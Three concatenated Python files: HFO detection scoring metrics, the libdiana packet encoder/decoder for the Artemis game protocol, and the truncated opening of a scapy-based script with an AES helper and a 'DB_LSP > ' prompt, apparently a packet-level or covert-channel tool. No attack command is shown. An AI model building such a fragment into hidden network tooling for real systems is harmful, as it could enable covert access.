    y_pred : pd.DataFrame
        Event Dataframe with predicted labels

    Returns
    -------
    float
        The true positive rate; ``0.`` when there are no true positives
        (which also covers the empty ``tp + fn == 0`` denominator).
    """
    tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
    # Zero-guard consistent with precision() and false_discovery_rate():
    # without it, tp == fn == 0 raises ZeroDivisionError.
    if tp == 0:
        return 0.
    # return actual metric
    return tp / (tp + fn)
def precision(y, y_pred):
    """
    Calculate precision as: precision = tp / (tp + fp).

    Parameters
    ----------
    y : pd.DataFrame
        Event Dataframe with actual labels
    y_pred : pd.DataFrame
        Event Dataframe with predicted labels

    Returns
    -------
    float
        Precision; ``0.`` when there are no true positives at all.
    """
    tp, fp, _fn = _compute_score_data(y, y_pred, method='match-total')
    # With no true positives the metric is defined as zero (also avoids
    # dividing by an empty denominator).
    return 0. if tp == 0 else tp / (tp + fp)
def false_negative_rate(y, y_pred):
    """
    Calculate false negative rate as: fnr = fn / (fn + tp).

    Parameters
    ----------
    y : pd.DataFrame
        Event Dataframe with actual labels
    y_pred : pd.DataFrame
        Event Dataframe with predicted labels

    Returns
    -------
    float
        The false negative rate; ``0.`` when there are no false
        negatives (which also covers the empty ``fn + tp == 0`` case).
    """
    tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
    # Zero-guard consistent with precision() and false_discovery_rate():
    # without it, fn == tp == 0 raises ZeroDivisionError.
    if fn == 0:
        return 0.
    # return actual metric
    return fn / (fn + tp)
def false_discovery_rate(y, y_pred):
    """
    Calculate false positive rate as: fdr = fp / (fp + tp).

    Parameters
    ----------
    y : pd.DataFrame
        Event Dataframe with actual labels
    y_pred : pd.DataFrame
        Event Dataframe with predicted labels

    Returns
    -------
    float
        The false discovery rate; ``0.`` when no false positives exist.
    """
    tp, fp, _fn = _compute_score_data(y, y_pred, method='match-total')
    # With no false positives the metric is zero by definition (also
    # avoids dividing by an empty denominator).
    return 0. if fp == 0. else fp / (fp + tp)
def accuracy(y, y_pred):
    """
    Calculate accuracy as: accuracy = tp / (tp + fp + fn).

    Follows usual formula for accuracy:
    accuracy = (tp + tn) / (tp + tn + fp + fn)
    but assumes tn = 0.

    Parameters
    ----------
    y : pd.DataFrame
        Annotation Dataframe with actual labels
    y_pred : pd.DataFrame
        Annotation Dataframe with predicted labels

    Returns
    -------
    float
        Accuracy; ``0.`` when there are no true positives (which also
        covers the fully-empty ``tp + fp + fn == 0`` denominator).
    """
    tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
    # Zero-guard consistent with precision() and false_discovery_rate():
    # without it, tp == fp == fn == 0 raises ZeroDivisionError.
    if tp == 0:
        return 0.
    # return actual metric
    return tp / (tp + fp + fn)
def _compute_score_data(y, y_pred, method):
    """Compute basic HFO scoring counts (tp, fp, fn) for a label pair."""
    def _as_annot_df(labels):
        # DataFrames are validated as annotation frames; anything else is
        # assumed to be the sklearn form — a list of (onset, offset) pairs
        # per channel — and converted.
        if isinstance(labels, pd.DataFrame):
            return _check_df(labels, df_type='annotations')
        return _convert_y_sklearn_to_annot_df(labels)

    y = _as_annot_df(y)
    y_pred = _as_annot_df(y_pred)
    matched = match_detected_annotations(y, y_pred, method=method)
    # The matched frame holds the paired indices; NaN marks an event with
    # no counterpart on the other side.
    return _calculate_match_stats(ytrue_indices=matched['true_index'],
                                  ypred_indices=matched['pred_index'])
def _calculate_match_stats(ytrue_indices, ypred_indices):
"""
Calculate true positives, false positives, and false negatives.
True negatives cannot be calculated for this dataset as of now.
Parameters
----------
ytrue_indices : pd.Series
Pandas Series with a number corresponding to an index and a
``nan`` if there is no match.
ypred_indices : pd.Series
Pandas Series with a number corresponding to an index and a
``nan`` if there is no match.
Returns
-------
tp: int
number of true positives - i.e. prediction and actual are both true
fp: int
number of false positives - i.e. prediction is true and actual is false
fn: int
number of false negatives - i.e. prediction is false and actual is true
"""
# Convert the match df structure to two lists of booleans.
# (True) and negatives (False).
# True if an index is present, False if Nan
y_true_bool = ytrue_indices.notna().to_list()
y_pred_bool = ypred_indices.notna().to_list()
# compute true positive, false positive and false negative
label_pairs = tuple(zip(y_true_bool, y_pred_bool))
tp = np.sum([(t and p) for t, p in label_pairs])
fp = np.sum([(p and not t) for t, p in label_pairs])
fn = np.sum([(t and not p) for t, p in label_pairs])
return tp, fp, fn
|
<reponame>nhammond129/libdiana
import struct
import sys
import math
from .encoding import encode as base_pack, decode as unpack
from .object_update import decode_obj_update_packet
from .enumerations import *
def pack(fmt, *args):
    """Pack ``*args`` per ``fmt`` via the project encoder.

    Thin convenience wrapper: collects the varargs and forwards them to
    ``encoding.encode`` as a single sequence.
    """
    return base_pack(fmt, args)
class SoftDecodeFailure(RuntimeError):
    """Raised when a packet body has no recognized subtype handler
    (see ``GameMessagePacket.decode``)."""
    pass
PACKETS = {}
def packet(n):
    """Class decorator: register the class under packet id ``n``.

    Stamps ``packet_id`` on the class and records it in ``PACKETS``.
    """
    def register(cls):
        cls.packet_id = n
        PACKETS[n] = cls
        return cls
    return register
class UndecodedPacket:
    """Fallback wrapper holding the raw bytes of an unparsed packet."""

    def __init__(self, packet_id, data):
        self.packet_id = packet_id
        self.data = data

    def encode(self):
        # Nothing was decoded, so the original bytes are the encoding.
        return self.data

    @classmethod
    def decode(cls, data):
        # The real id is unknown at this point; 0 is a placeholder.
        return cls(0, data)

    def __str__(self):
        return f'<UndecodedPacket id=0x{self.packet_id:08x} data={self.data!r}>'
@packet(0x6d04b3da)
class WelcomePacket:
    """Server greeting carrying a length-prefixed ASCII message."""

    def __init__(self, message=''):
        self.message = message

    def encode(self):
        payload = self.message.encode('ascii')
        return struct.pack('<I', len(payload)) + payload

    @classmethod
    def decode(cls, packet):
        declared_length, = struct.unpack('<I', packet[:4])
        message = packet[4:].decode('ascii')
        # The wire prefix must agree with the actual message length.
        if declared_length != len(message):
            raise ValueError(f'String length inconsistent with decoded length (should be {len(message)}, actually {declared_length})')
        return cls(message)

    def __str__(self):
        return f'<WelcomePacket {self.message!r}>'
@packet(0xe548e74a)
class VersionPacket:
    """Protocol version triple (major, minor, patch)."""

    def __init__(self, major, minor, patch):
        self.major = major
        self.minor = minor
        self.patch = patch

    def encode(self):
        # The wire format also carries a legacy float "major.minor" field.
        legacy_version = float('{}.{}'.format(self.major, self.minor))
        return pack('IfIII', 0, legacy_version,
                    self.major, self.minor, self.patch)

    @classmethod
    def decode(cls, packet):
        _unknown, _legacy, major, minor, patch = unpack('IfIII', packet)
        return cls(major, minor, patch)

    def __str__(self):
        return f'<VersionPacket {self.major}.{self.minor}.{self.patch}>'
@packet(0x3de66711)
class DifficultyPacket:
    """Difficulty level plus the type of game being played."""

    def __init__(self, difficulty, game_type):
        self.difficulty = difficulty
        self.game_type = game_type

    def encode(self):
        return pack('II', self.difficulty, self.game_type.value)

    @classmethod
    def decode(cls, packet):
        level, raw_game_type = unpack('II', packet)
        return cls(level, GameType(raw_game_type))

    def __str__(self):
        return f'<DifficultyPacket difficulty={self.difficulty} game_type={self.game_type}>'
@packet(0x19c6e2d4)
class ConsoleStatusPacket:
    """Availability status of every bridge console on one ship."""

    def __init__(self, ship, consoles):
        # Fill in all consoles, defaulting unlisted ones to 'available'.
        self.consoles = {console: consoles.get(console, ConsoleStatus.available)
                         for console in Console}
        self.ship = ship

    def encode(self):
        status_rows = [(self.consoles[console].value,) for console in Console]
        return pack('I[B]', self.ship, status_rows)

    @classmethod
    def decode(cls, packet):
        ship, rows = unpack('I[B]', packet)
        values = [row[0] for row in rows]
        if len(values) != len(Console):
            raise ValueError("Incorrect console count ({}, should be {})".format(len(values), len(Console)))
        statuses = {console: ConsoleStatus(values[console.value]) for console in Console}
        return cls(ship, statuses)

    def __str__(self):
        # Only show consoles that are not simply available.
        claimed = {console: status
                   for console, status in self.consoles.items()
                   if status != ConsoleStatus.available}
        return '<ConsoleStatusPacket ship={0} consoles={1!r}>'.format(self.ship, claimed)
@packet(0xf5821226)
class HeartbeatPacket:
    """Keep-alive packet; carries no payload at all."""

    def encode(self):
        return b''

    @classmethod
    def decode(cls, packet):
        # Any payload bytes mean this is not a valid heartbeat.
        if packet:
            raise ValueError('Payload in heartbeat')
        return cls()

    def __str__(self):
        return '<HeartbeatPacket>'
@packet(0xee665279)
class IntelPacket:
    """Free-form intel text attached to a game object."""

    def __init__(self, object, intel):
        self.object = object
        self.intel = intel

    def encode(self):
        # The middle byte is always 3 on the wire; meaning unconfirmed.
        return pack('Ibu', self.object, 3, self.intel)

    @classmethod
    def decode(cls, packet):
        target, _unknown, text = unpack('Ibu', packet)
        return cls(target, text)

    def __str__(self):
        return f'<IntelPacket object={self.object} intel={self.intel!r}>'
@packet(0xd672c35f)
class CommsIncomingPacket:
    """Incoming comms message; newlines travel as '^' on the wire."""

    def __init__(self, priority, sender, message):
        self.priority = priority
        self.sender = sender
        self.message = message

    def encode(self):
        wire_text = self.message.replace('\n', '^')
        return pack('Suu', self.priority, self.sender, wire_text)

    @classmethod
    def decode(cls, packet):
        priority, sender, wire_text = unpack('Suu', packet)
        return cls(priority, sender, wire_text.replace('^', '\n'))

    def __str__(self):
        return f'<CommsIncomingPacket priority={self.priority} sender={self.sender!r} message={self.message!r}>'
@packet(0x80803df9)
class ObjectUpdatePacket:
    """Raw world-state update whose payload is parsed lazily.

    The payload stays as raw bytes; parsing happens on demand so that a
    malformed update cannot break packet dispatch.
    """
    def __init__(self, raw_data):
        self.raw_data = raw_data
    @property
    def _records(self):
        # Parse on demand; may raise on a malformed payload.
        return decode_obj_update_packet(self.raw_data)
    @property
    def records(self):
        # Best-effort accessor: deliberately swallows parse errors and
        # yields an empty list instead of propagating them.
        try:
            return self._records
        except Exception:
            return []
    @classmethod
    def decode(cls, packet):
        # A four-zero-byte payload is treated as "nothing happened" and
        # surfaced as a distinct NoisePacket.
        if packet == b'\x00\x00\x00\x00':
            return NoisePacket()
        return cls(packet)
    def encode(self):
        return self.raw_data
    def __str__(self):
        # Show parsed records when possible; fall back to raw bytes + error.
        try:
            records = repr(self._records)
            return '<ObjectUpdatePacket records={}>'.format(records)
        except Exception as e:
            return '<ObjectUpdatePacket data={0!r} error={1!r}>'.format(self.raw_data, e)
class NoisePacket:
    """Stand-in for the four-zero-byte 'nothing happened' object update."""

    def __init__(self):
        # Shares the ObjectUpdatePacket id so it routes the same way.
        self.packet_id = 0x80803df9

    def encode(self):
        return bytes(4)

    def __str__(self):
        return '<NoisePacket>'
@packet(0xcc5a3e30)
class DestroyObjectPacket:
    """Notification that an object of a given type was removed."""

    def __init__(self, type, object):
        self.type = type
        self.object = object

    def encode(self):
        return pack('BI', self.type.value, self.object)

    @classmethod
    def decode(cls, packet):
        raw_type, object_id = unpack('BI', packet)
        return cls(type=ObjectType(raw_type), object=object_id)

    def __str__(self):
        return f'<DestroyObjectPacket type={self.type!r} object={self.object!r}>'
@packet(0xf754c8fe)
class GameMessagePacket:
    """Umbrella packet whose first payload byte selects a subtype."""

    @classmethod
    def decode(cls, packet):
        if not packet:
            raise ValueError('No payload in game message')
        # Dispatch on the subtype byte; unknown subtypes are a soft failure.
        subtype_handlers = {
            0: GameStartPacket,
            6: GameEndPacket,
            9: SkyboxPacket,
            10: PopupPacket,
            11: AutonomousDamconPacket,
            12: JumpStartPacket,
            13: JumpEndPacket,
            15: AllShipSettingsPacket,
            16: DmxPacket,
        }
        handler = subtype_handlers.get(packet[0])
        if handler is None:
            raise SoftDecodeFailure()
        return handler.decode(packet)
class GameStartPacket(GameMessagePacket):
    """Game-message subtype 0: the simulation has started."""

    _BYTES = b'\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if len(packet) != len(cls._BYTES):
            raise ValueError('Wrong packet length')
        return cls()

    def __str__(self):
        return '<GameStartPacket>'
class GameEndPacket(GameMessagePacket):
    """Game-message subtype 6: the simulation has ended."""

    _BYTES = b'\x06\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if len(packet) != len(cls._BYTES):
            raise ValueError('Wrong packet length')
        return cls()

    def __str__(self):
        return '<GameEndPacket>'
class AllShipSettingsPacket(GameMessagePacket):
    """Game-message subtype 15: settings for all eight player ships."""

    def __init__(self, ships):
        # Exactly eight records, each with .drive, .type and .name.
        self.ships = list(ships)
        if len(self.ships) != 8:
            raise ValueError('Must be 8 ships, {} given'.format(len(self.ships)))

    def encode(self):
        # NOTE(review): encode packs four fields per ship ('IIIu') while
        # decode expects five ('IIfIu'); the wire format is asymmetric
        # here -- confirm against the protocol before relying on a
        # round trip.
        return pack('I[IIIu]', 15,
                    [(ship.drive.value, ship.type.value, 1, ship.name)
                     for ship in self.ships])

    @classmethod
    def decode(cls, packet):
        # Ignores the float and extra int fields in each record.
        _id, records = unpack('I[IIfIu]', packet)
        return cls(ShipSettingsRecord(DriveType(drv), ShipType(typ), name)
                   for drv, typ, _accent, _what, name in records)

    def __str__(self):
        return '<AllShipSettingsPacket settings={0!r}>'.format(self.ships)
class JumpStartPacket(GameMessagePacket):
    """Game-message subtype 12: a combat jump is starting."""

    _BYTES = b'\x0c\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if len(packet) != len(cls._BYTES):
            raise ValueError('Wrong packet length')
        return cls()

    def __str__(self):
        return '<JumpStartPacket>'
class JumpEndPacket(GameMessagePacket):
    """Game-message subtype 13: a combat jump has completed."""

    _BYTES = b'\x0d\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if len(packet) != len(cls._BYTES):
            raise ValueError('Wrong packet length')
        return cls()

    def __str__(self):
        return '<JumpEndPacket>'
class DmxPacket(GameMessagePacket):
    """Game-message subtype 0x10: set a DMX lighting flag on or off."""

    def __init__(self, flag, state):
        self.flag = flag    # flag identifier ('u' wire field)
        self.state = state  # truthy = on

    def encode(self):
        return pack('IuI', 0x10, self.flag, int(self.state))

    @classmethod
    def decode(cls, packet):
        _subtype, flag, state = unpack('IuI', packet)
        return cls(flag, state)

    def __str__(self):
        return '<DmxPacket flag={0!r} state={1!r}>'.format(self.flag, self.state)
class SkyboxPacket(GameMessagePacket):
    """Game-message subtype 9: switch the client to a numbered skybox."""

    def __init__(self, skybox):
        self.skybox = skybox

    def encode(self):
        return pack('II', 9, self.skybox)

    @classmethod
    def decode(cls, packet):
        _subtype, skybox = unpack('II', packet)
        return cls(skybox)

    def __str__(self):
        return '<SkyboxPacket skybox={0!r}>'.format(self.skybox)
class PopupPacket(GameMessagePacket):
    """Game-message subtype 0x0a: show a popup message on a console."""

    def __init__(self, message):
        self.message = message

    def encode(self):
        return pack('Iu', 0x0a, self.message)

    @classmethod
    def decode(cls, packet):
        _subtype, text = unpack('Iu', packet)
        return cls(text)

    def __str__(self):
        return '<PopupPacket message={0!r}>'.format(self.message)
class AutonomousDamconPacket(GameMessagePacket):
    """Game-message subtype 0x0b: toggle DAMCON team autonomy."""

    def __init__(self, autonomy):
        self.autonomy = autonomy  # bool

    def encode(self):
        return pack('II', 0x0b, int(self.autonomy))

    @classmethod
    def decode(cls, packet):
        _subtype, flag = unpack('II', packet)
        return cls(bool(flag))

    def __str__(self):
        return '<AutonomousDamconPacket autonomy={0!r}>'.format(self.autonomy)
@packet(0x4c821d3c)
class ShipAction1Packet:
    """First family of client console actions; decoding dispatches on
    the first payload byte.
    """

    @classmethod
    def decode(cls, packet):
        if not packet:
            raise ValueError('No payload in game message')
        subtypes = {
            0: HelmSetWarpPacket,
            1: SetMainScreenPacket,
            2: SetWeaponsTargetPacket,
            3: ToggleAutoBeamsPacket,
            4: ToggleShieldsPacket,
            7: HelmRequestDockPacket,
            10: ToggleRedAlertPacket,
            11: SetBeamFreqPacket,
            13: SetShipPacket,
            14: SetConsolePacket,
            15: ReadyPacket,
            16: SciSelectPacket,
            17: CaptainSelectPacket,
            18: GameMasterSelectPacket,
            19: SciScanPacket,
            22: SetShipSettingsPacket,
            24: HelmToggleReversePacket,
            25: Ready2Packet,
            26: TogglePerspectivePacket,
            27: ClimbDivePacket,
        }
        try:
            subtype = subtypes[packet[0]]
        except KeyError:
            # Unknown subtype: let the caller keep it as an undecoded packet.
            raise SoftDecodeFailure()
        return subtype.decode(packet)
class SciScanPacket(ShipAction1Packet):
    """Subtype 19: science officer starts scanning a target."""

    def __init__(self, target):
        self.target = target  # object id of the scan target

    def encode(self):
        return pack('II', 19, self.target)

    @classmethod
    def decode(cls, packet):
        _subtype, target = unpack('II', packet)
        return cls(target)

    def __str__(self):
        return "<SciScanPacket target={0!r}>".format(self.target)
class CaptainSelectPacket(ShipAction1Packet):
    """Subtype 17: captain's map selection (None clears it)."""

    def __init__(self, object):
        self.object = object

    def encode(self):
        # Object id 1 is the wire encoding for "no selection".
        target = 1 if self.object is None else self.object
        return pack('II', 17, target)

    @classmethod
    def decode(cls, packet):
        _subtype, target = unpack('II', packet)
        return cls(None if target == 1 else target)

    def __str__(self):
        return "<CaptainSelectPacket object={0!r}>".format(self.object)
class GameMasterSelectPacket(ShipAction1Packet):
    """Subtype 18: game master's map selection (None clears it)."""

    def __init__(self, object):
        self.object = object

    def encode(self):
        # Object id 1 is the wire encoding for "no selection".
        target = 1 if self.object is None else self.object
        return pack('II', 18, target)

    @classmethod
    def decode(cls, packet):
        _subtype, target = unpack('II', packet)
        return cls(None if target == 1 else target)

    def __str__(self):
        return "<GameMasterSelectPacket object={0!r}>".format(self.object)
class SciSelectPacket(ShipAction1Packet):
    """Subtype 16: science officer's selection (None clears it)."""

    def __init__(self, object):
        self.object = object

    def encode(self):
        # Object id 1 is the wire encoding for "no selection".
        target = 1 if self.object is None else self.object
        return pack('II', 16, target)

    @classmethod
    def decode(cls, packet):
        _subtype, target = unpack('II', packet)
        return cls(None if target == 1 else target)

    def __str__(self):
        return "<SciSelectPacket object={0!r}>".format(self.object)
class SetWeaponsTargetPacket(ShipAction1Packet):
    """Subtype 2: weapons officer's target (None clears it)."""

    def __init__(self, object):
        self.object = object

    def encode(self):
        # Object id 1 is the wire encoding for "no target".
        target = 1 if self.object is None else self.object
        return pack('II', 2, target)

    @classmethod
    def decode(cls, packet):
        _subtype, target = unpack('II', packet)
        return cls(None if target == 1 else target)

    def __str__(self):
        return "<SetWeaponsTargetPacket object={0!r}>".format(self.object)
class SetBeamFreqPacket(ShipAction1Packet):
    """Subtype 11: set the beam frequency index."""

    def __init__(self, freq):
        self.freq = freq

    def encode(self):
        return pack('II', 11, self.freq)

    @classmethod
    def decode(cls, packet):
        _subtype, freq = unpack('II', packet)
        return cls(freq)

    def __str__(self):
        return "<SetBeamFreqPacket freq={}>".format(self.freq)
class HelmToggleReversePacket(ShipAction1Packet):
    """Subtype 24: toggle reverse thrust (no arguments)."""

    _BYTES = b'\x18\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if packet != cls._BYTES:
            raise ValueError('Unexpected payload in reverse packet')
        return cls()

    def __str__(self):
        return '<HelmToggleReversePacket>'
class ReadyPacket(ShipAction1Packet):
    """Subtype 15: client signals it is ready (no arguments)."""

    _BYTES = b'\x0f\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if packet != cls._BYTES:
            raise ValueError('Unexpected payload in ready packet')
        return cls()

    def __str__(self):
        return '<ReadyPacket>'
class Ready2Packet(ShipAction1Packet):
    """Subtype 25: second ready signal variant (no arguments)."""

    _BYTES = b'\x19\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, packet):
        if packet != cls._BYTES:
            raise ValueError('Unexpected payload in ready2 packet')
        return cls()

    def __str__(self):
        return '<Ready2Packet>'
class SetShipSettingsPacket(ShipAction1Packet):
    """Subtype 0x16: configure this ship's drive, hull type and name."""

    def __init__(self, drive, type, name):
        self.drive = drive  # DriveType member
        self.type = type    # ShipType member
        self.name = name

    def encode(self):
        return pack('IIIIu', 0x16, self.drive.value, self.type.value, 1, self.name)

    @classmethod
    def decode(cls, packet):
        _subtype, drive_id, type_id, _unknown, name = unpack('IIIIu', packet)
        return cls(drive=DriveType(drive_id), type=ShipType(type_id), name=name)

    def __str__(self):
        return '<SetShipSettingsPacket drive={0!r} type={1!r} name={2!r}>'.format(self.drive, self.type, self.name)
class HelmRequestDockPacket(ShipAction1Packet):
    """Subtype 7: request docking with the nearest base (no arguments)."""

    _BYTES = b'\x07\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, data):
        if data != cls._BYTES:
            raise SoftDecodeFailure()
        return cls()

    def __str__(self):
        return '<HelmRequestDockPacket>'
class ToggleShieldsPacket(ShipAction1Packet):
    """Subtype 4: raise/lower the shields (no arguments)."""

    _BYTES = b'\x04\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, data):
        if data != cls._BYTES:
            raise SoftDecodeFailure()
        return cls()

    def __str__(self):
        return '<ToggleShieldsPacket>'
class ToggleRedAlertPacket(ShipAction1Packet):
    """Subtype 0x0a: toggle red alert (no arguments)."""

    _BYTES = b'\x0a\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, data):
        if data != cls._BYTES:
            raise SoftDecodeFailure()
        return cls()

    def __str__(self):
        return '<ToggleRedAlertPacket>'
class ToggleAutoBeamsPacket(ShipAction1Packet):
    """Subtype 3: toggle automatic beam fire (no arguments)."""

    _BYTES = b'\x03\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, data):
        if data != cls._BYTES:
            raise SoftDecodeFailure()
        return cls()

    def __str__(self):
        return '<ToggleAutoBeamsPacket>'
class TogglePerspectivePacket(ShipAction1Packet):
    """Subtype 26: toggle the main-screen camera perspective (no arguments)."""

    _BYTES = b'\x1a\x00\x00\x00\x00\x00\x00\x00'

    def encode(self):
        return self._BYTES

    @classmethod
    def decode(cls, data):
        if data != cls._BYTES:
            raise SoftDecodeFailure()
        return cls()

    def __str__(self):
        return '<TogglePerspectivePacket>'
class ClimbDivePacket(ShipAction1Packet):
    """Subtype 27: set climb/dive direction (signed wire field)."""

    def __init__(self, direction):
        self.direction = direction

    def encode(self):
        return pack('Ii', 27, self.direction)

    @classmethod
    def decode(cls, packet):
        _subtype, direction = unpack('Ii', packet)
        return cls(direction)

    def __str__(self):
        return "<ClimbDivePacket direction={0!r}>".format(self.direction)
class SetMainScreenPacket(ShipAction1Packet):
    """Subtype 1: choose what the main screen displays."""

    def __init__(self, screen):
        self.screen = screen  # MainView enum member

    def encode(self):
        return pack('II', 1, self.screen.value)

    @classmethod
    def decode(cls, packet):
        _subtype, view_id = unpack('II', packet)
        return cls(MainView(view_id))

    def __str__(self):
        return "<SetMainScreenPacket screen={0!r}>".format(self.screen)
class SetConsolePacket(ShipAction1Packet):
    """Subtype 0x0e: claim or release a console seat."""

    def __init__(self, console, selected):
        self.console = console    # Console enum member
        self.selected = selected  # True = claimed

    def encode(self):
        return pack('III', 0x0e, self.console.value, 1 if self.selected else 0)

    @classmethod
    def decode(cls, packet):
        _subtype, console_id, taken = unpack('III', packet)
        return cls(Console(console_id), bool(taken))

    def __str__(self):
        return "<SetConsolePacket console={0!r} selected={1!r}>".format(self.console, self.selected)
class HelmSetWarpPacket(ShipAction1Packet):
    """Subtype 0: set the warp factor."""

    def __init__(self, warp):
        self.warp = warp

    def encode(self):
        return pack('II', 0, self.warp)

    @classmethod
    def decode(cls, packet):
        _subtype, factor = unpack('II', packet)
        return cls(factor)

    def __str__(self):
        return "<HelmSetWarpPacket warp={}>".format(self.warp)
class SetShipPacket(ShipAction1Packet):
    """Subtype 0x0d: pick which player ship this client crews."""

    def __init__(self, ship):
        self.ship = ship

    def encode(self):
        return pack('II', 0x0d, self.ship)

    @classmethod
    def decode(cls, packet):
        _subtype, ship = unpack('II', packet)
        return cls(ship)

    def __str__(self):
        return "<SetShipPacket ship={}>".format(self.ship)
@packet(0x0351a5ac)
class ShipAction3Packet:
    """Client helm value updates; decoding dispatches on the first
    payload byte.
    """

    @classmethod
    def decode(cls, packet):
        if not packet:
            raise ValueError('No payload in game message')
        subtypes = {
            0: HelmSetImpulsePacket,
            1: HelmSetSteeringPacket,
            5: HelmJumpPacket,
        }
        try:
            subtype = subtypes[packet[0]]
        except KeyError:
            raise SoftDecodeFailure()
        return subtype.decode(packet)
class HelmSetSteeringPacket(ShipAction3Packet):
    """Subtype 1: set the rudder position (float wire field)."""

    def __init__(self, rudder):
        self.rudder = rudder

    def encode(self):
        return pack('If', 1, self.rudder)

    @classmethod
    def decode(cls, packet):
        _subtype, rudder = unpack('If', packet)
        return cls(rudder)

    def __str__(self):
        return '<HelmSetSteeringPacket rudder={0!r}>'.format(self.rudder)
class HelmSetImpulsePacket(ShipAction3Packet):
    """Subtype 0: set the impulse throttle (float wire field)."""

    def __init__(self, impulse):
        self.impulse = impulse

    def encode(self):
        return pack('If', 0, self.impulse)

    @classmethod
    def decode(cls, packet):
        _subtype, throttle = unpack('If', packet)
        return cls(throttle)

    def __str__(self):
        return '<HelmSetImpulsePacket impulse={0!r}>'.format(self.impulse)
class HelmJumpPacket(ShipAction3Packet):
    """Subtype 5: initiate a combat jump.

    The wire format carries the bearing as a fraction of a full turn and
    the distance divided by 50; this class exposes the scaled-up values.
    """

    def __init__(self, bearing, distance):
        self.bearing = bearing
        self.distance = distance

    def encode(self):
        return pack('Iff', 5, self.bearing / (math.pi * 2), self.distance / 50)

    @classmethod
    def decode(cls, packet):
        _subtype, turn_fraction, wire_distance = unpack('Iff', packet)
        return cls(turn_fraction * (math.pi * 2), wire_distance * 50)

    def __str__(self):
        return '<HelmJumpPacket bearing={0!r} distance={1!r}>'.format(self.bearing, self.distance)
@packet(0xb83fd2c4)
class BeamFiredPacket:
    """Server notice that a beam weapon fired.

    ``object``: id of the firing object; ``port``: beam port index;
    ``origin``/``target``: object ids; ``x``, ``y``, ``z``: impact
    coordinates; ``auto``: True when fired by auto-beams (wire flag 0).
    """

    def __init__(self, object, port, origin, target, x, y, z, auto):
        self.object = object
        self.port = port
        self.origin = origin
        self.target = target
        self.x = x
        self.y = y
        self.z = z
        self.auto = auto

    def encode(self):
        return pack('IIIIIIIIIfffI',
                    self.object, 1, 1200,
                    self.port,
                    1, 1, 0,
                    self.origin, self.target,
                    self.x, self.y, self.z,
                    0 if self.auto else 1)

    @classmethod
    def decode(cls, packet):
        fields = unpack('IIIIIIIIIfffI', packet)
        (obj, _unk1, _unk2, port, _origintype, _targettype, _unk3,
         origin, target, x, y, z, manual) = fields
        # Wire flag: 0 means automatic fire, 1 means manual.
        return cls(obj, port, origin, target, x, y, z, [True, False][manual])

    def __str__(self):
        return '<BeamFiredPacket object={object} port={port} origin={origin} target={target} position=({x}, {y}, {z}) automatic={auto!r}>'.format(**self.__dict__)
def encode(packet, provenance=PacketProvenance.client):
    """Frame *packet* for the wire.

    Produces the 24-byte little-endian header (magic, total length,
    provenance, padding, remaining length, packet id) followed by the
    packet's encoded body.
    """
    body = packet.encode()
    body_len = len(body)
    header = struct.pack('<IIIIII',
                         0xdeadbeef,
                         24 + body_len,
                         provenance.value,
                         0x00,
                         4 + body_len,
                         packet.packet_id)
    return header + body
def decode(packet, provenance=PacketProvenance.server): # returns packets, trail
    """Split a received byte buffer into decoded packets.

    Returns ``(packets, trail)`` where ``trail`` is the unconsumed
    remainder to be prepended to the next read.  Recurses once per
    complete frame in the buffer.
    """
    if not packet:
        return [], b''
    # Resynchronize on 0xef, the first byte of the little-endian
    # 0xdeadbeef magic (bytes.find with an int requires Python 3).
    de_index = packet.find(0xef)
    if de_index > 0:
        sys.stderr.write("WARNING: skipping {} bytes of stream to resync\n".format(de_index))
        sys.stderr.flush()
        packet = packet[de_index:]
    elif de_index == -1:
        # No magic byte anywhere in the buffer: discard it all.
        return [], b''
    buffer_len = len(packet)
    if buffer_len < 24:
        # Incomplete header; wait for more data.
        return [], packet
    header, packet_len, origin, padding, remaining, ptype = struct.unpack('<IIIIII', packet[:24])
    if header != 0xdeadbeef:
        raise ValueError("Incorrect packet header")
    if packet_len < 24:
        raise ValueError("Packet too short")
    if origin != provenance.value:
        raise ValueError("Incorrect packet origin field")
    if remaining != packet_len - 20:
        # "remaining" counts from just after itself (packet id onward).
        raise ValueError("Inconsistent packet length fields")
    if buffer_len < packet_len:
        # Frame not fully received yet.
        return [], packet
    trailer = packet[packet_len:]
    payload = packet[24:packet_len]
    # NOTE(review): this recursive call uses the default (server)
    # provenance rather than the caller's -- confirm that client-side
    # buffers are never decoded through here.
    rest, trailer = decode(trailer)
    try:
        if ptype in PACKETS:
            # we know how to decode this one
            return [PACKETS[ptype].decode(payload)] + rest, trailer
        else:
            raise SoftDecodeFailure()
    except SoftDecodeFailure: # meaning unhandled bits
        return [UndecodedPacket(ptype, payload)] + rest, trailer
|
#!/usr/bin/python
import os
import sys
import csv
import json
import socket
import base64
import hashlib
import threading
from scapy.all import *
from Crypto import Random
from Crypto.Cipher import AES
from StringIO import StringIO
PROMPT = "DB_LSP > "
counter = 0 # Create a Packet Counter
class AESCipher(object):
    """AES-256-CBC helper with length-byte padding (PyCrypto, Python 2).

    The key is derived as SHA-256(passphrase); ciphertext is returned
    base64-encoded with the random IV prepended.  _pad/_unpad rely on
    Python 2 byte-string semantics.
    """
    def __init__(self, key):
        # Pad plaintext to a multiple of 32 bytes.
        self.bs = 32
        self.key = hashlib.sha256(key.encode()).digest()
    def encrypt(self, raw):
        # Pad, draw a fresh random IV, and prepend it to the ciphertext.
        raw = self._pad(raw)
